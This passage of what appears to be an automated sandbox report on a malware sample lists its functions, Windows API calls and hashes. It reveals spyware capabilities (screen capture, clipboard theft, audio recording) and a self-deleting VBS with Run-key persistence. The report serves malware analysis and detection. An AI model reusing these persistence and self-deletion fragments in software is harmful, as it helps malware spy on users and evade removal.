                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 274C61E4
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 274C61F1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                    • Opcode ID: 78c78fbf3cffd025009e3e2756e5a66da325dcfc268cff912a2151c833be947d
                                                                                                                                                                    • Instruction ID: 1c4f0a0c929ad86b783970387c797a1a5e574e889b482f5411d1d69b69619534
                                                                                                                                                                    • Opcode Fuzzy Hash: 78c78fbf3cffd025009e3e2756e5a66da325dcfc268cff912a2151c833be947d
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D31D37490122CDBCB21DF29D9897CDBBB8AF48710F5081EEE81CA7250EB749B818F45
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004432EF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                                                                                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                                                                                                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                                                                                                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000,00000001,274C2082,274D2108,0000000C,274C1F3A,?), ref: 274C4AD5
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000,00000001,274C2082,274D2108,0000000C,274C1F3A,?), ref: 274C4ADC
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 274C4AEE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                    • Opcode ID: 971b6853a8a05b962e3071e457bb5712d8a5f03245adcc5ec30dbf35d5c4ddcc
                                                                                                                                                                    • Instruction ID: 6c8c24f599db5fa335909f014e76e4564b971ace7e4a13dd24c06fc612feeb60
                                                                                                                                                                    • Opcode Fuzzy Hash: 971b6853a8a05b962e3071e457bb5712d8a5f03245adcc5ec30dbf35d5c4ddcc
                                                                                                                                                                    • Instruction Fuzzy Hash: 03E0BF39000204EFDF02AF5ACE09A993F69FF40745B50401CF90557121DF39D993CA55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040B711
                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040B725
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                                    • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                                                                                                                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                                                                                                                    • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                                                                                                                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                                                                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                                                                                                                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                                                                                                                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                                                                                                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                                                                                                                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                                                                                                                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                                                                                                                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00418FEC
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00418FF9
                                                                                                                                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 0041917C
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00419182
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00419258
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                    • API String ID: 4256916514-865373369
                                                                                                                                                                    • Opcode ID: 7aae0363b82f15def8c1581c033c038ec08a9654ede249bf66ec2ce172949d4b
                                                                                                                                                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                                                                                                                    • Opcode Fuzzy Hash: 7aae0363b82f15def8c1581c033c038ec08a9654ede249bf66ec2ce172949d4b
                                                                                                                                                                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                                                                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                                                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                                                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                                                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041C510,00000000,00000000,?), ref: 0041C430
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                    • API String ID: 1861856835-332907002
                                                                                                                                                                    • Opcode ID: 7cc0c98288c0119a44133e8490d399651bb14fb5177cdd2c1d89a987e8487361
                                                                                                                                                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                                                                                                                    • Opcode Fuzzy Hash: 7cc0c98288c0119a44133e8490d399651bb14fb5177cdd2c1d89a987e8487361
                                                                                                                                                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                                                                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                                                                                                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                                                                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                                                                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D419
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                    • API String ID: 3797177996-2557013105
                                                                                                                                                                    • Opcode ID: 2debcc6bf3125d5e17e50028151b22dbbd83ba3fd43fe76836cda192c3f5f902
                                                                                                                                                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                                                                                                                    • Opcode Fuzzy Hash: 2debcc6bf3125d5e17e50028151b22dbbd83ba3fd43fe76836cda192c3f5f902
                                                                                                                                                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                                                                                                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                                                                                                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041C510,00000000,00000000,?), ref: 0041C430
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                                                    • API String ID: 2649220323-436679193
                                                                                                                                                                    • Opcode ID: 0681ceed030fd07f2c6c35b636bd357a716a10239b41aabe8fecb3bb8a72a298
                                                                                                                                                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                                                                                                                    • Opcode Fuzzy Hash: 0681ceed030fd07f2c6c35b636bd357a716a10239b41aabe8fecb3bb8a72a298
                                                                                                                                                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                                                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                                                                                                                    • SetEvent.KERNEL32 ref: 0041B219
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                                                                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                                    • API String ID: 738084811-2094122233
                                                                                                                                                                    • Opcode ID: 88e6de5a846f13b7e49bc902712e9981a9fe0264f8ea6fb0e4510d26c2f049a7
                                                                                                                                                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                                                                                                                    • Opcode Fuzzy Hash: 88e6de5a846f13b7e49bc902712e9981a9fe0264f8ea6fb0e4510d26c2f049a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
